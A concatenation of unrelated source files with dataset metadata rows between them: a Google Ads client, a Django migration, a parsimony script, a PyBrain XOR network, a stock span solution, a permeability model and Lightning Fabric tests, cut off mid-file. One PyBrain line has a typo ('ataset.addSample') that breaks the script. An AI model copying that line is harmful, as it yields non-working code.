return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str, ) -> str:
"""Return a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(billing_account=billing_account, )
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str,str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str, ) -> str:
"""Return a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder, )
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str,str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str, ) -> str:
"""Return a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization, )
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str,str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str, ) -> str:
"""Return a fully-qualified project string."""
return "projects/{project}".format(project=project, )
@staticmethod
def parse_common_project_path(path: str) -> Dict[str,str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str, ) -> str:
"""Return a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(project=project, location=location, )
@staticmethod
def parse_common_location_path(path: str) -> Dict[str,str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(self, *,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, ShoppingPerformanceViewServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the shopping performance view service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.ShoppingPerformanceViewServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")))
ssl_credentials = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
import grpc # type: ignore
cert, key = client_options.client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
is_mtls = True
else:
creds = SslCredentials()
is_mtls = creds.is_mtls
ssl_credentials = creds.ssl_credentials if is_mtls else None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT if is_mtls else self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, ShoppingPerformanceViewServiceTransport):
# transport is a ShoppingPerformanceViewServiceTransport instance.
if credentials:
raise ValueError('When providing a transport instance, '
'provide its credentials directly.')
self._transport = transport
elif isinstance(transport, str):
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials, host=self.DEFAULT_ENDPOINT
)
else:
self._transport = ShoppingPerformanceViewServiceGrpcTransport(
credentials=credentials,
host=api_endpoint,
ssl_channel_credentials=ssl_credentials,
client_info=client_info,
)
def get_shopping_performance_view(self,
request: shopping_performance_view_service.GetShoppingPerformanceViewRequest = None,
*,
resource_name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> shopping_performance_view.ShoppingPerformanceView:
r"""Returns the requested Shopping performance view in
full detail.
Args:
request (:class:`google.ads.googleads.v5.services.types.GetShoppingPerformanceViewRequest`):
The request object. Request message for
[ShoppingPerformanceViewService.GetShoppingPerformanceView][google.ads.googleads.v5.services.ShoppingPerformanceViewService.GetShoppingPerformanceView].
resource_name (:class:`str`):
Required. The resource name of the
Shopping performance view to fetch.
This corresponds to the ``resource_name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.ads.googleads.v5.resources.types.ShoppingPerformanceView:
Shopping performance view.
Provides Shopping campaign statistics
aggregated at several product dimension
levels. Product dimension values from
Merchant Center such as brand, category,
custom attributes, product condition and
product type will reflect the state of
each dimension as of the date and time
when the corresponding event was
recorded.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
if request is not None and any([resource_name]):
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a shopping_performance_view_service.GetShoppingPerformanceViewRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, shopping_performance_view_service.GetShoppingPerformanceViewRequest):
request = shopping_performance_view_service.GetShoppingPerformanceViewRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if resource_name is not None:
request.resource_name = resource_name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_shopping_performance_view]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('resource_name', request.resource_name),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
__all__ = (
'ShoppingPerformanceViewServiceClient',
)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
55c9cd30b623e0a078ad1d54a62099bb5c2984c0 | 80edae503da03b3350fe458553860ea44a1a74dd | /backend/tasker_business/migrations/0001_initial.py | 1becb346c243dade1b06e637926556b3c9397ec7 | [] | no_license | crowdbotics-apps/our-protection-26031 | e4059bd616eff63f0d67ec869b49b9f6530fd2e6 | 7dbeef820b127efdf5c2a87d47a934b06c0ba87e | refs/heads/master | 2023-04-15T14:38:17.312365 | 2021-04-29T22:45:17 | 2021-04-29T22:45:17 | 362,954,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,277 | py | # Generated by Django 2.2.19 on 2021-04-29 22:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
("task_category", "0001_initial"),
("task_profile", "0001_initial"),
]
operations = [
migrations.CreateModel(
name="Timeslot",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("date", models.DateField()),
("start_time", models.TimeField()),
("end_time", models.TimeField()),
],
),
migrations.CreateModel(
name="TaskerSkill",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=255)),
("rate", models.FloatField()),
("description", models.TextField()),
(
"category",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="taskerskill_category",
to="task_category.Category",
),
),
(
"subcategory",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="taskerskill_subcategory",
to="task_category.Subcategory",
),
),
(
"tasker",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="taskerskill_tasker",
to="task_profile.TaskerProfile",
),
),
],
),
migrations.CreateModel(
name="TaskerAvailability",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"tasker",
models.OneToOneField(
on_delete=django.db.models.deletion.CASCADE,
related_name="taskeravailability_tasker",
to="task_profile.TaskerProfile",
),
),
(
"timeslots",
models.ManyToManyField(
related_name="taskeravailability_timeslots",
to="tasker_business.Timeslot",
),
),
],
),
migrations.CreateModel(
name="BusinessPhoto",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("photo", models.URLField()),
("description", models.TextField()),
(
"tasker",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="businessphoto_tasker",
to="task_profile.TaskerProfile",
),
),
],
),
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
4a97cb424cf33bfbbc4a39b5a6c9b7b242fab2db | 272032c7604e0e9627f4cf42967aa3230a8facbc | /lect7dendropy/pars.py | c5af0dc1b8f6ece33455f2e44c9d8135f55c2585 | [] | no_license | mtholder/eebprogramming | 78ebaf5ca2163cc7da977b411087bf164fce6059 | b7478643b4cb3ce91c299753eb346626640c3378 | refs/heads/master | 2021-01-01T18:34:27.502098 | 2010-05-06T16:26:50 | 2010-05-06T16:26:50 | 493,047 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,577 | py | #!/usr/bin/env python
import sys, logging
from dendropy.utility.messaging import get_logger
_LOG = get_logger('sankoff')
from dendropy import DataSet
_DEBUGGING = True
verbose = False
def get_min_edge_costs(cost_row, costs_for_one_child):
min_score = cost_row[0] + costs_for_one_child[0]
for i in xrange(1, len(cost_row)):
y = cost_row[i] + costs_for_one_child[i]
if y < min_score:
min_score = y
return min_score
def get_min_cost(step_mat_row, child_costs):
total_cost = 0
for e in child_costs:
total_cost = total_cost + get_min_edge_costs(step_mat_row, e)
return total_cost
def sankoff(postorder_node_list, taxa_to_state_set_map, step_matrix):
max_cost = 0
num_states = len(step_matrix)
for row in step_matrix:
for cell in row:
if cell > max_cost:
max_cost = cell
impossible_cost = 1 + max_cost
impossible_cost_row = [impossible_cost] * num_states
score = 0
for nd in postorder_node_list:
if nd.is_leaf():
char_costs = []
for char_ss in taxa_to_state_set_map[nd.taxon]:
el = list(impossible_cost_row)
for observed_state in char_ss:
el[observed_state] = 0
char_costs.append(el)
nd.char_costs = char_costs
_LOG.debug(nd.taxon.label + ' -> ' + str(nd.char_costs))
else:
child_list = nd.child_nodes()
char_costs = []
num_patterns = len(child_list[0].char_costs)
for pattern_index in xrange(num_patterns):
child_costs = []
for c in child_list:
child_costs.append(c.char_costs[pattern_index])
el = []
for anc_state in xrange(num_states):
c = get_min_cost(step_matrix[anc_state], child_costs)
el.append(c)
char_costs.append(el)
nd.char_costs = char_costs
_LOG.debug('Internal node -> ' + str(nd.char_costs))
if not nd.parent_node:
for pattern_index in xrange(num_patterns):
score += min(nd.char_costs[pattern_index])
return score
def pars_score_tree(tree, taxa_to_states, step_matrix=None):
if step_matrix is None:
step_matrix = [ [0, 1, 1, 1],
[1, 0, 1, 1],
[1, 1, 0, 1],
[1, 1, 1, 0],
]
node_list = [i for i in tree.postorder_node_iter()]
return sankoff(node_list, taxa_to_states, step_matrix)
if __name__ == '__main__':
from optparse import OptionParser
parser = OptionParser()
parser.add_option('-v', '--verbose',
dest='verbose',
action="store_true",
default=False,
help="Verbose execution mode")
(options, args) = parser.parse_args()
if len(args) == 0:
sys.exit("Expecting a filename as an argument")
if options.verbose:
_LOG.setLevel(logging.DEBUG)
tree_index = 0
try:
for f in args:
fo = open(f, "rU")
dataset = DataSet()
dataset.read(stream=fo, schema="NEXUS")
if len(dataset.taxon_sets) != 1:
raise ValueError("Expecting one set of taxa in %s" % f)
taxon_set = dataset.taxon_sets[0]
if len(dataset.tree_lists) != 1:
raise ValueError("Expecting one tree block in %s" % f)
tree_list = dataset.tree_lists[0]
if len(dataset.char_matrices) != 1:
raise ValueError("Expecting one character matrix in %s" % f)
char_mat = dataset.char_matrices[0]
num_char = len(char_mat[0])
taxon_to_state_set = char_mat.create_taxon_to_state_set_map()
for taxon, chars in taxon_to_state_set.iteritems():
_LOG.debug(taxon.label + ' ' + str(chars))
for tree in tree_list:
_LOG.debug(str(tree))
print pars_score_tree(tree, taxon_to_state_set, [ [0, 5, 1, 5],
[5, 0, 5, 1],
[1, 5, 0, 5],
[5, 1, 5, 0],
])
except Exception as x:
if _DEBUGGING:
raise
sys.exit(str(x))
| [
"mtholder@gmail.com"
] | mtholder@gmail.com |
541d1592cf2ae6cebfff7a7b20f3462f581214cc | 30fb85c14e18956fe5690f4224e55d3fa34651ce | /ml_neural_networks_pybrain_hidden_layers.py | 74540ed511b295a20436d4a35911af2b1d035e41 | [] | no_license | TiagoArrazi/Semantix-Internship | 1d39cc310b75be3b395d3a7df1dde7543fa4db84 | 87f93db82e9594ce0911b4e6264a4981e4f0ac14 | refs/heads/master | 2020-04-02T22:53:25.937133 | 2020-01-17T12:58:40 | 2020-01-17T12:58:40 | 154,848,050 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,010 | py | #! /usr/bin/env python3
# Classification with PyBrain - 3D XOR
from pybrain.datasets import SupervisedDataSet
from pybrain.tools.shortcuts import buildNetwork
from pybrain.supervised import BackpropTrainer
dataset = SupervisedDataSet(3, 1)
dataset.addSample([0, 0, 0], [0])
dataset.addSample([0, 0, 1], [1])
dataset.addSample([0, 1, 0], [1])
dataset.addSample([0, 1, 1], [0])
dataset.addSample([1, 0, 0], [1])
dataset.addSample([1, 0, 1], [0])
dataset.addSample([1, 1, 0], [0])
ataset.addSample([1, 1, 1], [1])
network = buildNetwork(dataset.indim, 6, 6, dataset.outdim, bias=True)
trainer = BackpropTrainer(network, dataset, learningrate=0.01, momentum=0.9)
trainer.trainEpochs(10000)
test = SupervisedDataSet(3, 1)
test.addSample([0, 0, 0], [0])
test.addSample([0, 0, 1], [1])
test.addSample([0, 1, 0], [1])
test.addSample([0, 1, 1], [0])
test.addSample([1, 0, 0], [1])
test.addSample([1, 0, 1], [0])
test.addSample([1, 1, 0], [0])
test.addSample([1, 1, 1], [1])
trainer.testOnData(test, verbose=True)
| [
"tiago_arrazi98@outlook.com"
] | tiago_arrazi98@outlook.com |
0cf22fe3aa57e99a7fbc6dc4b130ea7deb1c47ac | 23e844d75a0214ed5ad48885d008e23516383610 | /toughio/_utils/relative_permeability/_fatt_klikoff.py | 4ce84e87d5101ff08fb032c15715b9972bbe9848 | [
"MIT"
] | permissive | codacy-badger/toughio | dc1b138a5defa7b00b0833526d67c372d9b6d1f5 | 8d4f3d8408d5507a83f65e7f393b13be08d42aca | refs/heads/master | 2021-02-04T21:32:49.721095 | 2020-02-28T07:49:33 | 2020-02-28T07:49:33 | 243,711,552 | 0 | 0 | MIT | 2020-02-28T08:15:36 | 2020-02-28T08:15:36 | null | UTF-8 | Python | false | false | 920 | py | from ._base import BaseRelativePermeability
__all__ = [
"FattKlikoff",
]
class FattKlikoff(BaseRelativePermeability):
"""Fatt and Klikoff's function.
After Fatt and Klikoff (1959).
Parameters
----------
slr : scalar
Irreducible liquid saturation (RP(1)).
"""
_id = 7
_name = "Fatt-Klikoff"
def __init__(self, slr):
if slr >= 1.0:
raise ValueError()
self.parameters = [slr]
def _eval(self, sl, slr):
"""Fatt and Klikoff's function."""
Seff = (sl - slr) / (1.0 - slr) if sl > slr else 0.0
kl = Seff ** 3
kg = (1.0 - Seff) ** 3
return kl, kg
@property
def parameters(self):
"""Return model parameters."""
return [self._slr]
@parameters.setter
def parameters(self, value):
if len(value) != 1:
raise ValueError()
self._slr = value[0]
| [
"keurfonluu@outlook.com"
] | keurfonluu@outlook.com |
318d451e5e9baa4b1d4cc02121cf2c36efd4eab3 | 959a7b17884aa9af1d38d9c6b0afe2045a9be5d2 | /Online Stock Span.py | 47a2706584a1006572a38de6b4dcb896fef431dd | [] | no_license | dumavit/leetcode | a1c998f4c56411b061995d939093b03f7aae366b | 866689f564125ca4152dc1b6b3d268991d7ec89a | refs/heads/master | 2022-02-07T20:44:17.388121 | 2022-01-31T21:02:28 | 2022-01-31T21:02:28 | 252,981,197 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | class StockSpanner:
def __init__(self):
self.stack = []
def next(self, price):
res = 1
while self.stack and self.stack[-1][0] <= price:
res += self.stack.pop()[1]
self.stack.append([price, res])
return res
# Your StockSpanner object will be instantiated and called as such:
# obj = StockSpanner()
# param_1 = obj.next(price)
| [
"vitalii.duma@corva.ai"
] | vitalii.duma@corva.ai |
631803569c7f82f06c6e7ae6b7b80050c78627b2 | 3b4f985759e44dc169134ae7dcee8e92747c4b01 | /tests/tests_fabric/test_fabric.py | 076f6515acf2bd3aecd6863fe1b3dab512ebab32 | [
"Apache-2.0"
] | permissive | SkafteNicki/pytorch-lightning | 4b09863bf222241ca7128d13df94ff60b71e50aa | 7df627b43746a85aa87671bec3e6dada0d98b556 | refs/heads/master | 2023-07-15T21:20:02.468216 | 2023-05-04T08:12:33 | 2023-05-04T08:12:33 | 248,216,299 | 3 | 1 | Apache-2.0 | 2023-07-10T02:40:24 | 2020-03-18T11:44:20 | Python | UTF-8 | Python | false | false | 39,347 | py | # Copyright The Lightning AI team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from re import escape
from unittest import mock
from unittest.mock import ANY, call, MagicMock, Mock, PropertyMock
import pytest
import torch
import torch.distributed
import torch.nn.functional
from lightning_utilities.test.warning import no_warning_call
from torch import nn
from torch.utils.data import DataLoader, DistributedSampler, RandomSampler, Sampler, SequentialSampler, TensorDataset
from lightning.fabric.fabric import Fabric
from lightning.fabric.plugins import Precision
from lightning.fabric.strategies import (
DDPStrategy,
DeepSpeedStrategy,
ParallelStrategy,
SingleDeviceStrategy,
Strategy,
XLAStrategy,
)
from lightning.fabric.strategies.strategy import _Sharded
from lightning.fabric.utilities.exceptions import MisconfigurationException
from lightning.fabric.utilities.seed import pl_worker_init_function, seed_everything
from lightning.fabric.utilities.warnings import PossibleUserWarning
from lightning.fabric.wrappers import _FabricDataLoader, _FabricModule, _FabricOptimizer
from tests_fabric.helpers.runif import RunIf
class BoringModel(nn.Module):
def __init__(self):
super().__init__()
self.layer = torch.nn.Linear(32, 2, bias=False)
def forward(self, x):
x = self.layer(x)
return torch.nn.functional.mse_loss(x, torch.ones_like(x))
def test_run_input_output():
"""Test that the dynamically patched run() method receives the input arguments and returns the result."""
class RunFabric(Fabric):
run_args = ()
run_kwargs = {}
def run(self, *args, **kwargs):
self.run_args = args
self.run_kwargs = kwargs
return "result"
fabric = RunFabric()
result = fabric.run(1, 2, three=3)
assert result == "result"
assert fabric.run_args == (1, 2)
assert fabric.run_kwargs == {"three": 3}
@mock.patch("lightning.fabric.strategies.ddp.DistributedDataParallel")
@pytest.mark.parametrize("setup_method", ["setup", "setup_module"])
def test_setup_module(ddp_mock, setup_method):
"""Test that the setup method lets the strategy wrap the model, but keeps a reference to the original model."""
fabric = Fabric(accelerator="cpu", strategy="ddp", devices=2)
model = nn.Linear(1, 2)
setup_method = getattr(fabric, setup_method)
fabric_model = setup_method(model)
ddp_mock.assert_called_with(module=model, device_ids=ANY)
assert fabric_model.module == model
assert fabric_model.weight is model.weight
assert fabric_model.forward != model.forward
@RunIf(skip_windows=True, dynamo=True)
@pytest.mark.parametrize("setup_method", ["setup", "setup_module"])
def test_setup_compiled_module(setup_method):
"""Test that an `OptimizedModule` can be passed to the setup method."""
from torch._dynamo.eval_frame import OptimizedModule
fabric = Fabric(devices=1)
model = nn.Linear(1, 2)
compiled_model = torch.compile(model)
assert isinstance(compiled_model, OptimizedModule)
setup_method = getattr(fabric, setup_method)
fabric_model = setup_method(compiled_model)
assert fabric_model.module == compiled_model
# Attributes get passed through
assert fabric_model.weight is model.weight
@pytest.mark.parametrize(
"accelerator, initial_device, target_device",
[
("cpu", "cpu", "cpu"),
pytest.param("cpu", "cuda:0", "cpu", marks=RunIf(min_cuda_gpus=1)),
pytest.param("cpu", "mps:0", "cpu", marks=RunIf(mps=True)),
pytest.param("cuda", "cpu", "cuda:0", marks=RunIf(min_cuda_gpus=1)),
pytest.param("cuda", "cuda:1", "cuda:0", marks=RunIf(min_cuda_gpus=2)),
pytest.param("mps", "cpu", "mps:0", marks=RunIf(mps=True)),
],
)
@pytest.mark.parametrize("move_to_device", [True, False])
@pytest.mark.parametrize("setup_method", ["setup", "setup_module"])
def test_setup_module_move_to_device(setup_method, move_to_device, accelerator, initial_device, target_device):
"""Test that `move_to_device` leads to parameters being moved to the correct device and that the device
attributes on the wrapper are updated."""
initial_device = torch.device(initial_device)
target_device = torch.device(target_device)
expected_device = target_device if move_to_device else initial_device
fabric = Fabric(accelerator=accelerator, devices=1)
model = nn.Linear(1, 2)
model.to(initial_device)
setup_method = getattr(fabric, setup_method)
fabric_model = setup_method(model, move_to_device=move_to_device)
# all parameters on the expected device
assert all(param.device == expected_device for param in model.parameters())
assert all(param.device == expected_device for param in fabric_model.parameters())
assert fabric_model.device == expected_device
assert fabric.device == target_device
# edge case: model has no parameters
model = nn.Sequential()
fabric_model = setup_method(model, move_to_device=move_to_device)
assert fabric_model.device == target_device if move_to_device else torch.device("cpu")
@RunIf(min_cuda_gpus=1)
@pytest.mark.parametrize("move_to_device", [True, False])
@pytest.mark.parametrize("setup_method", ["setup", "setup_module"])
def test_setup_module_parameters_on_different_devices(setup_method, move_to_device):
"""Test that a warning is emitted when model parameters are on a different device prior to calling
`setup()`."""
device0 = torch.device("cpu")
device1 = torch.device("cuda", 0)
fabric = Fabric(accelerator="cuda", devices=1)
module0 = nn.Linear(1, 2).to(device0)
module1 = nn.Linear(1, 2).to(device1)
model = nn.Sequential(module0, module1)
setup_method = getattr(fabric, setup_method)
if move_to_device:
with pytest.warns(PossibleUserWarning, match="has parameters on different devices"):
fabric_model = setup_method(model, move_to_device=move_to_device)
# both have the same device now
assert fabric_model.device == device1
assert module0.weight.device == module0.bias.device == device1
assert module1.weight.device == module1.bias.device == device1
else:
with no_warning_call(expected_warning=PossibleUserWarning, match="has parameters on different devices"):
setup_method(model, move_to_device=move_to_device)
def test_setup_module_and_optimizers():
"""Test that `setup()` can handle no optimizers, one optimizer, or multiple optimizers."""
fabric = Fabric(devices=1)
model = nn.Linear(1, 2)
optimizer0 = torch.optim.SGD(model.parameters(), lr=0.1)
optimizer1 = torch.optim.Adam(model.parameters(), lr=0.1)
# no optimizer
fabric_model = fabric.setup(model)
assert isinstance(fabric_model, _FabricModule)
assert fabric_model.module is model
# single optimizer
fabric_model, fabric_optimizer = fabric.setup(model, optimizer0)
assert isinstance(fabric_model, _FabricModule)
assert isinstance(fabric_optimizer, _FabricOptimizer)
assert fabric_model.module is model
assert fabric_optimizer.optimizer is optimizer0
# multiple optimizers
fabric_model, fabric_optimizer0, fabric_optimizer1 = fabric.setup(model, optimizer0, optimizer1)
assert isinstance(fabric_model, _FabricModule)
assert isinstance(fabric_optimizer0, _FabricOptimizer)
assert isinstance(fabric_optimizer1, _FabricOptimizer)
assert fabric_model.module is model
assert fabric_optimizer0.optimizer is optimizer0
assert fabric_optimizer1.optimizer is optimizer1
def test_setup_optimizers():
"""Test that `setup_optimizers()` can handle one or more optimizers."""
fabric = Fabric()
model = nn.Linear(1, 2)
optimizer0 = torch.optim.SGD(model.parameters(), lr=0.1)
optimizer1 = torch.optim.Adam(model.parameters(), lr=0.1)
# single optimizer
fabric_optimizer = fabric.setup_optimizers(optimizer0)
assert isinstance(fabric_optimizer, _FabricOptimizer)
assert fabric_optimizer.optimizer is optimizer0
# multiple optimizers
fabric_optimizer0, fabric_optimizer1 = fabric.setup_optimizers(optimizer0, optimizer1)
assert isinstance(fabric_optimizer0, _FabricOptimizer)
assert isinstance(fabric_optimizer1, _FabricOptimizer)
assert fabric_optimizer0.optimizer is optimizer0
assert fabric_optimizer1.optimizer is optimizer1
def test_setup_twice_fails():
"""Test that calling `setup` with a model or optimizer that is already wrapped fails."""
fabric = Fabric(devices=1)
model = nn.Linear(1, 2)
optimizer = torch.optim.Adam(model.parameters())
fabric_model, fabric_optimizer = fabric.setup(model, optimizer)
with pytest.raises(ValueError, match="A model should be passed only once to the"):
fabric.setup(fabric_model, optimizer)
fabric_model, fabric_optimizer = fabric.setup(model, optimizer)
with pytest.raises(ValueError, match="An optimizer should be passed only once to the"):
fabric.setup(model, fabric_optimizer)
def test_setup_module_twice_fails():
"""Test that calling `setup_module` with a model that is already wrapped fails."""
fabric = Fabric(devices=1)
model = nn.Linear(1, 2)
fabric_model = fabric.setup_module(model)
with pytest.raises(ValueError, match="A model should be passed only once to the"):
fabric.setup_module(fabric_model)
def test_setup_optimizers_twice_fails():
"""Test that calling `setup_module` with a model that is already wrapped fails."""
fabric = Fabric()
model = nn.Linear(1, 2)
optimizer = torch.optim.Adam(model.parameters())
fabric_optimizer = fabric.setup_optimizers(optimizer)
with pytest.raises(ValueError, match="An optimizer should be passed only once to"):
fabric.setup_optimizers(fabric_optimizer)
@pytest.mark.parametrize("strategy_cls", [DeepSpeedStrategy, XLAStrategy])
def test_setup_optimizers_not_supported(strategy_cls):
"""Test that `setup_optimizers` validates the strategy supports setting up model and optimizers
independently."""
fabric = Fabric()
model = nn.Linear(1, 2)
optimizer = torch.optim.Adam(model.parameters())
fabric._strategy = Mock(spec=strategy_cls)
with pytest.raises(RuntimeError, match=escape("requires the model and optimizer(s) to be set up jointly through")):
fabric.setup_optimizers(optimizer)
def test_setup_tracks_num_models():
"""Test that setup() tracks how many times it has setup a model."""
fabric = Fabric(devices=1)
model = nn.Linear(1, 2)
optimizer = torch.optim.Adam(model.parameters())
assert fabric._models_setup == 0
fabric.setup(model, optimizer)
assert fabric._models_setup == 1
fabric.setup(model, optimizer)
assert fabric._models_setup == 2
fabric.setup_module(model)
assert fabric._models_setup == 3
def test_setup_dataloaders_unsupported_input():
"""Test that the setup_dataloaders method fails when provided with non-DataLoader objects."""
fabric = Fabric()
with pytest.raises(ValueError, match="`setup_dataloaders` requires at least one dataloader"):
fabric.setup_dataloaders()
with pytest.raises(TypeError, match="Only PyTorch DataLoader are currently supported"):
fabric.setup_dataloaders(range(2)) # type: ignore
def test_setup_dataloaders_return_type():
"""Test that the setup method returns the dataloaders wrapped as FabricDataLoader and in the right order."""
fabric = Fabric(devices=1)
# single dataloader
fabric_dataloader = fabric.setup_dataloaders(DataLoader(range(2)))
assert isinstance(fabric_dataloader, _FabricDataLoader)
# multiple dataloaders
dataset0 = Mock()
dataset1 = Mock()
dataloader0 = DataLoader(dataset0)
dataloader1 = DataLoader(dataset1)
fabric_dataloader0, fabric_dataloader1 = fabric.setup_dataloaders(dataloader0, dataloader1)
assert isinstance(fabric_dataloader0, _FabricDataLoader)
assert isinstance(fabric_dataloader1, _FabricDataLoader)
assert fabric_dataloader0.dataset is dataset0
assert fabric_dataloader1.dataset is dataset1
@mock.patch("lightning.fabric.fabric._replace_dunder_methods")
def test_setup_dataloaders_captures_dataloader_arguments(ctx_manager):
"""Test that Fabric intercepts the DataLoader constructor arguments with a context manager in its run
method."""
class RunFabric(Fabric):
def run(self):
# One for BatchSampler, another for DataLoader
assert ctx_manager().__enter__.call_count == 2
RunFabric().run()
assert ctx_manager().__exit__.call_count == 2
def test_setup_dataloaders_raises_for_unknown_custom_args():
"""Test that an error raises when custom dataloaders with unknown arguments are created from outside Fabric's
run method."""
fabric = Fabric()
class CustomDataLoader(DataLoader):
def __init__(self, new_arg, *args, **kwargs):
super().__init__(range(5), *args, **kwargs)
with pytest.raises(
MisconfigurationException,
match=(
r"Trying to inject custom `Sampler` into the `CustomDataLoader` instance.*"
r"The missing attributes are \['new_arg'\]"
),
):
# The dataloader was not created within the run function, and therefore init args were not intercepted
dataloader = CustomDataLoader(2, batch_size=2)
fabric.setup_dataloaders(dataloader)
def test_setup_dataloaders_twice_fails():
"""Test that calling setup_dataloaders with a dataloader that is already wrapped fails."""
fabric = Fabric()
dataloader = DataLoader(range(2))
fabric_dataloader = fabric.setup_dataloaders(dataloader)
with pytest.raises(ValueError, match="A dataloader should be passed only once to the"):
fabric.setup_dataloaders(fabric_dataloader)
@mock.patch(
